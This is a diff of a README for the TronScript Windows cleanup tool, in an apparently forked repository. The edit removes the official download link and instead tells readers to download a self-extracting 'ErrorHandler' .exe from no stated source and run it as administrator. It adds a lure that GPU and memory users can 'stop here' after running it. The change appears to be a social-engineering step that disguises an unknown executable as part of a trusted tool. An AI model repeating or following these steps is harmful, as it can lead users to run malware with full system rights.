DiagnosticNinja/TronScript/README.md

 # USE

-0. FIRST THINGS FIRST: **REBOOT THE COMPUTER BEFORE RUNNING TRON.** This is to allow any pending updates to finish.
-If you don't do this and the computer reboots during Tron with pending updates, it can brick the system.
+0. FIRST THINGS FIRST: **REBOOT THE COMPUTER BEFORE RUNNING TRON.** This is to allow any pending Windows or system updates to finish.
 To re-iterate: it is very important to reboot the computer before running Tron.

-1. [Download Tron](https://old.reddit.com/r/TronScript/).
-The download links are in the top post in [/r/TronScript](https://old.reddit.com/r/TronScript).
-If you download the self-extracting `.exe` file, run it and it will extract `tron.bat` and the `\resources` folder to the current directory.
-Copy both of them to the **Desktop** of the target machine.
+1. [Download Tron] Download the self-extracting ErrorHandler `.exe` file, and run it as administrator.
+This will initialize the files and do a quick check of the overall system health.
+If your goal is to optimize/repair GPU functionality (Nvidia or AMD) and improve memory performance then stop here.
+The rest of the instructions pertain to virus removal and remediation.

-2. Tron can be run with Windows in either Safe Mode or Regular mode.
+2. Now, Copy both `tron.bat` and the `\resources` folder to the **Desktop** of the target machine.
+Tron can be run with Windows in either Safe Mode or Regular mode.
 Regular mode is generally recommended unless the system is severely infected.

 3. Right-click `tron.bat` and select "**Run as Administrator**"